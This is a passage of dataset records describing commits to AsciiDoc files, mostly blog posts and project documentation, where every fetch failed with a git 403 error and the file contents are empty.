error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"402d30def215df63cdb2285b01d75781e81dce27","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e3e2fb45c7dff563c68c3fc0b75e0eb914849a5","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/readings\/the_little_prince.adoc","new_file":"content\/readings\/the_little_prince.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3949e859aa89458329c8783d38be351f0ad5f3d5","subject":"Publish DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","message":"Publish DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","new_file":"DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a48d9f838b9790894b6af9d547fabb12d6cccb2","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35412d1b150a2f21154fbccd33a31cae655d9e05","subject":"Small fix to first time config presentation","message":"Small fix to first time config presentation\n\nSigned-off-by: Ido Barnea <3a6e28cf60eb2f9d9d6e5ab6275926d9a599fe66@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/trex_config.asciidoc","new_file":"doc\/trex_config.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf9bd1ecddd6ae97a03a7f4a3a26a80c41a6bcb8","subject":"final push on the annoucment post -- needs to incorporate feedback from Stu and Alex and pull out relevant bits into the guide","message":"final push on the annoucment post -- needs to incorporate feedback from Stu and Alex and pull out relevant bits into the guide\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/07\/02\/tools-build.adoc","new_file":"content\/news\/2021\/07\/02\/tools-build.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0b6e5c18f257b9587e15912acdbd0096a9cf0bca","subject":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9d6854e8f8ee1d59720a7952abfc56a5482cf99","subject":"Update 2016-01-15-Building-and-installing-Python-modules.adoc","message":"Update 2016-01-15-Building-and-installing-Python-modules.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-15-Building-and-installing-Python-modules.adoc","new_file":"_posts\/2016-01-15-Building-and-installing-Python-modules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7eda7659683394cf4b5c67d784855be21e9ca8ab","subject":"y2b create post Testing INSANE mode on the P85D","message":"y2b create post Testing INSANE mode on the P85D","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-02-16-Testing-INSANE-mode-on-the-P85D.adoc","new_file":"_posts\/2015-02-16-Testing-INSANE-mode-on-the-P85D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e97632a67473d5251f16468d939a77568c4cf639","subject":"\u0410\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u0441\u043a\u0430 \u0432\u0435\u0436\u0431\u0430 9","message":"\u0410\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u0441\u043a\u0430 \u0432\u0435\u0436\u0431\u0430 9\n\n\u0421\u0440\u0435\u0434\u0435\u043d \u0435 .adoc \u0444\u0430\u0458\u043b\u043e\u0442 \u043a\u043e\u0458 \u043c\u043e\u0436\u0435 \u043d\u0435\u043a\u0430 \u0433\u043e \u0438\u0441\u043a\u043e\u043c\u043f\u0430\u0458\u043b\u0438\u0440\u0430 \u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u0438 \u0432\u043e master.","repos":"finki-mk\/OOP,finki-mk\/OOP","old_file":"docs\/src\/oop_av9.adoc","new_file":"docs\/src\/oop_av9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/finki-mk\/OOP.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bb95976677a94885d563011e7d8e7b79c403b56","subject":"Update 2013-04-29-Good-programmers-are-lazy.adoc","message":"Update 2013-04-29-Good-programmers-are-lazy.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-04-29-Good-programmers-are-lazy.adoc","new_file":"_posts\/2013-04-29-Good-programmers-are-lazy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1420da6d8667c1afc8ce1d13cbaa2de784d4d668","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7db0a86185cd62b63e6a7ddd4a84d5a0672d41f6","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7dd86ebd3ed70f583e9667b51b41e1f623e7f60","subject":"y2b create post The $2800 Game Console You Didn't Know Existed...","message":"y2b create post The $2800 Game Console You Didn't Know Existed...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-06-The-2800-Game-Console-You-Didnt-Know-Existed.adoc","new_file":"_posts\/2017-11-06-The-2800-Game-Console-You-Didnt-Know-Existed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7692de771169d8364067da55a5673cdfb199e564","subject":"Delete Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","message":"Delete Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","new_file":"_posts\/Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4849235270fe8f5f3eebef8850b0af216d7c3ff","subject":"The initial rough outline for a getting started guide.","message":"The initial rough outline for a getting started guide.\n","repos":"Rikkola\/uberfire,psiroky\/uberfire,paulovmr\/uberfire,kiereleaseuser\/uberfire,dgutierr\/uberfire,Rikkola\/uberfire,Salaboy\/uberfire,mbiarnes\/uberfire,porcelli-forks\/uberfire,porcelli-forks\/uberfire,paulovmr\/uberfire,dgutierr\/uberfire,uberfire\/uberfire,wmedvede\/uberfire,karreiro\/uberfire,mbarkley\/uberfire,ederign\/uberfire,qmx\/uberfire,porcelli-forks\/uberfire,porcelli-forks\/uberfire,paulovmr\/uberfire,Salaboy\/uberfire,Salaboy\/uberfire,uberfire\/uberfire,paulovmr\/uberfire,cristianonicolai\/uberfire,mbiarnes\/uberfire,psiroky\/uberfire,Rikkola\/uberfire,karreiro\/uberfire,Salaboy\/uberfire,psiroky\/uberfire,dgutierr\/uberfire,baldimir\/uberfire,mbiarnes\/uberfire,mbarkley\/uberfire,kiereleaseuser\/uberfire,mbarkley\/uberfire,baldimir\/uberfire,mbiarnes\/uberfire,mbarkley\/uberfire,ederign\/uberfire,wmedvede\/uberfire,paulovmr\/uberfire,ederign\/uberfire,karreiro\/uberfire,psiroky\/uberfire,Rikkola\/uberfire,kiereleaseuser\/uberfire,cristianonicolai\/uberfire,kiereleaseuser\/uberfire,qmx\/uberfire,ederign\/uberfire,qmx\/uberfire,wmedvede\/uberfire,baldimir\/uberfire,baldimir\/uberfire,uberfire\/uberfire,wmedvede\/uberfire,qmx\/uberfire,uberfire\/uberfire,cristianonicolai\/uberfire,dgutierr\/uberfire,cristianonicolai\/uberfire,karreiro\/uberfire","old_file":"uberfire-docs\/src\/main\/asciidoc\/getting-started.asciidoc","new_file":"uberfire-docs\/src\/main\/asciidoc\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Rikkola\/uberfire.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"580433460eee1984cb6de9d9820ef9e78c5b9047","subject":"y2b create post World's Largest Gummy Bear (Feat. My 4 year old)","message":"y2b create post World's Largest Gummy Bear (Feat. My 4 year old)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-13-Worlds-Largest-Gummy-Bear-Feat-My-4-year-old.adoc","new_file":"_posts\/2014-03-13-Worlds-Largest-Gummy-Bear-Feat-My-4-year-old.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"521c035c0003b126216648c976a49d62e60eccfb","subject":"Update 2015-09-08-Cursos-Gratuitos-para-aprender-una-profesion.adoc","message":"Update 2015-09-08-Cursos-Gratuitos-para-aprender-una-profesion.adoc","repos":"AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-09-08-Cursos-Gratuitos-para-aprender-una-profesion.adoc","new_file":"_posts\/2015-09-08-Cursos-Gratuitos-para-aprender-una-profesion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlonsoCampos\/AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"301df0790393132a2b7fc46e00db2032edd9cef2","subject":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","message":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"186548eb67cffee211aa50a0d3dc96750b9ecba6","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c48e72d449822c84ba349f91982d8426845778","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22ff7c95b1fb139fc8db250ece10d23ab0d54a8f","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6842618759d148773bb2e2f7ee692c38c82a17fd","subject":"Update 2017-05-24-swift-chat.adoc","message":"Update 2017-05-24-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-24-swift-chat.adoc","new_file":"_posts\/2017-05-24-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b544f26a37b7cd755f0ec04347be559385a4715a","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/02\/04\/deref.adoc","new_file":"content\/news\/2022\/02\/04\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2997e688873e85872b4ac539c7ec6c84867c97ee","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"186890bb1669dcbaca2793008f77df9898d6579c","subject":"Update 2016-01-27-How-to-call-a-Kubernetes-Service-on-OpenShift.adoc","message":"Update 2016-01-27-How-to-call-a-Kubernetes-Service-on-OpenShift.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-01-27-How-to-call-a-Kubernetes-Service-on-OpenShift.adoc","new_file":"_posts\/2016-01-27-How-to-call-a-Kubernetes-Service-on-OpenShift.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c86186819c156272505b230671c46d0a403b1d52","subject":"Update 2018-03-27-early-2018-financial-review.adoc","message":"Update 2018-03-27-early-2018-financial-review.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-03-27-early-2018-financial-review.adoc","new_file":"_posts\/2018-03-27-early-2018-financial-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0ceb835107e12567ce6c5774c3bb6f8191fbd4b","subject":"Update 2021-04-26-Hello.adoc","message":"Update 2021-04-26-Hello.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2021-04-26-Hello.adoc","new_file":"_posts\/2021-04-26-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a1d950977c69a800c98737d04bd965dd9eedc94","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"848f6fb255e97d332f4326a237e08b9dc6d9bbd5","subject":"Update 2015-12-02-Title.adoc","message":"Update 2015-12-02-Title.adoc","repos":"alexhanschke\/hubpress.io,alexhanschke\/hubpress.io,alexhanschke\/hubpress.io","old_file":"_posts\/2015-12-02-Title.adoc","new_file":"_posts\/2015-12-02-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexhanschke\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10a0f70d52697fd556061f11b3cc82aa7cd4724c","subject":"Update 2015-06-10-Web-Development-Journey-update.adoc","message":"Update 2015-06-10-Web-Development-Journey-update.adoc","repos":"jsonify\/jsonify.github.io,jsonify\/jsonify.github.io,jsonify\/jsonify.github.io","old_file":"_posts\/2015-06-10-Web-Development-Journey-update.adoc","new_file":"_posts\/2015-06-10-Web-Development-Journey-update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsonify\/jsonify.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2c2e731e3bb249393fdc2092415334ef627313e","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02087cd2d00be66902c07f8c857ce6e231f2de03","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2be3fe31a448b04338a9db2e184c9d7ee162082f","subject":"Docs: Update filter-aggregation.asciidoc","message":"Docs: Update filter-aggregation.asciidoc\n\nCloses #11782\n","repos":"loconsolutions\/elasticsearch,jprante\/elasticsearch,Charlesdong\/elasticsearch,girirajsharma\/elasticsearch,sdauletau\/elasticsearch,zeroctu\/elasticsearch,MichaelLiZhou\/elasticsearch,ImpressTV\/elasticsearch,ckclark\/elasticsearch,KimTaehee\/elasticsearch,kunallimaye\/elasticsearch,rlugojr\/elasticsearch,IanvsPoplicola\/elasticsearch,weipinghe\/elasticsearch,nknize\/elasticsearch,fooljohnny\/elasticsearch,trangvh\/elasticsearch,hanswang\/elasticsearch,gmarz\/elasticsearch,weipinghe\/elasticsearch,yynil\/elasticsearch,AshishThakur\/elasticsearch,masterweb121\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,xuzha\/elasticsearch,xuzha\/elasticsearch,jpountz\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,Uiho\/elasticsearch,hydro2k\/elasticsearch,snikch\/elasticsearch,andrejserafim\/elasticsearch,dataduke\/elasticsearch,diendt\/elasticsearch,easonC\/elasticsearch,xuzha\/elasticsearch,Charlesdong\/elasticsearch,luiseduardohdbackup\/elasticsearch,wittyameta\/elasticsearch,pranavraman\/elasticsearch,khiraiwa\/elasticsearch,Stacey-Gammon\/elasticsearch,kunallimaye\/elasticsearch,jimhooker2002\/elasticsearch,Rygbee\/elasticsearch,btiernay\/elasticsearch,luiseduardohdbackup\/elasticsearch,TonyChai24\/ESSource,vingupta3\/elasticsearch,jsgao0\/elasticsearch,Ansh90\/elasticsearch,beiske\/elasticsearch,i-am-Nathan\/elasticsearch,ulkas\/elasticsearch,pozhidaevak\/elasticsearch,andrestc\/elasticsearch,Shepard1212\/elasticsearch,beiske\/elasticsearch,djschny\/elasticsearch,hirdesh2008\/elasticsearch,njlawton\/elasticsearch,sneivandt\/elasticsearch,markllama\/elasticsearch,jango2015\/elasticsearch,rento19962\/elasticsearch,hirdesh2008\/elasticsearch,petabytedata\/elasticsearch,thecocce\/elasticsearch,koxa29\/elasticsearch,ivansun1010\/elasticsearch,smflorentino\/elasticsearch,zeroctu\/elasticsearch,Helen-Zhao\/elasticsearch,SergVro\/elasticsearch,mm0\/elasticsearch,xuzha\/elasticsearch,bestwpw\/elasticsearch,F0lha\/elasticsearch,jimczi\/elasticsearch,mapr\/elasticsearch,tkssharma\/elasticsearch,kimimj\/elasticsearch,jprante\/elasticsearch,wayeast\/elasticsearch,mm0\/elasticsearch,socialrank\/elasticsearch,karthikjaps\/elasticsearch,lightslife\/elasticsearch,nknize\/elasticsearch,sreeramjayan\/elasticsearch,wangtuo\/elasticsearch,khiraiwa\/elasticsearch,clintongormley\/elasticsearch,vvcephei\/elasticsearch,kingaj\/elasticsearch,geidies\/elasticsearch,huanzhong\/elasticsearch,EasonYi\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,mgalushka\/elasticsearch,myelin\/elasticsearch,ouyangkongtong\/elasticsearch,avikurapati\/elasticsearch,brandonkearby\/elasticsearch,smflorentino\/elasticsearch,ydsakyclguozi\/elasticsearch,wimvds\/elasticsearch,nellicus\/elasticsearch,pritishppai\/elasticsearch,alexshadow007\/elasticsearch,huypx1292\/elasticsearch,knight1128\/elasticsearch,zkidkid\/elasticsearch,humandb\/elasticsearch,MichaelLiZhou\/elasticsearch,yuy168\/elasticsearch,dongjoon-hyun\/elasticsearch,jchampion\/elasticsearch,wangtuo\/elasticsearch,episerver\/elasticsearch,uschindler\/elasticsearch,yongminxia\/elasticsearch,dongjoon-hyun\/elasticsearch,lydonchandra\/elasticsearch,mjason3\/elasticsearch,fekaputra\/elasticsearch,Kakakakakku\/elasticsearch,alexbrasetvik\/elasticsearch,rhoml\/elasticsearch,achow\/elasticsearch,polyfractal\/elasticsearch,weipinghe\/elasticsearch,jbertouch\/elasticsearch,zeroctu\/elasticsearch,javachengwc\/elasticsearch,TonyChai24\/ESSource,Brijeshrpatel9\/elasticsearch,mjhennig\/elasticsearch,davidvgalbraith\/elasticsearch,kalimatas\/elasticsearch,artnowo\/elasticsearch,slavau\/elasticsearch,winstonewert\/elasticsearch,kcompher\/elasticsearch,socialrank\/elasticsearch,himanshuag\/elasticsearch,queirozfcom\/elasticsearch,rajanm\/elasticsearch,camilojd\/elasticsearch,zkidkid\/elasticsearch,artnowo\/elasticsearch,pranavraman\/elasticsearch,hanswang\/elasticsearch,JackyMai\/elasticsearch,SergVro\/elasticsearch,maddin2016\/elasticsearch,petabytedata\/elasticsearch,smflorentino\/elasticsearch,tkssharma\/elasticsearch,skearns64\/elasticsearch,nezirus\/elasticsearch,infusionsoft\/elasticsearch,markllama\/elasticsearch,socialrank\/elasticsearch,wuranbo\/elasticsearch,Fsero\/elasticsearch,kcompher\/elasticsearch,franklanganke\/elasticsearch,Charlesdong\/elasticsearch,MaineC\/elasticsearch,Widen\/elasticsearch,amaliujia\/elasticsearch,hechunwen\/elasticsearch,luiseduardohdbackup\/elasticsearch,mrorii\/elasticsearch,kimimj\/elasticsearch,btiernay\/elasticsearch,elancom\/elasticsearch,infusionsoft\/elasticsearch,kenshin233\/elasticsearch,strapdata\/elassandra5-rc,nezirus\/elasticsearch,mcku\/elasticsearch,schonfeld\/elasticsearch,jsgao0\/elasticsearch,sauravmondallive\/elasticsearch,springning\/elasticsearch,khiraiwa\/elasticsearch,awislowski\/elasticsearch,spiegela\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,JSCooke\/elasticsearch,kingaj\/elasticsearch,Siddartha07\/elasticsearch,mm0\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,huypx1292\/elasticsearch,zhiqinghuang\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,gmarz\/elasticsearch,njlawton\/elasticsearch,springning\/elasticsearch,strapdata\/elassandra-test,gmarz\/elasticsearch,ESamir\/elasticsearch,EasonYi\/elasticsearch,knight1128\/elasticsearch,kenshin233\/elasticsearch,weipinghe\/elasticsearch,MjAbuz\/elasticsearch,lzo\/elasticsearch-1,alexbrasetvik\/elasticsearch,nomoa\/elasticsearch,Collaborn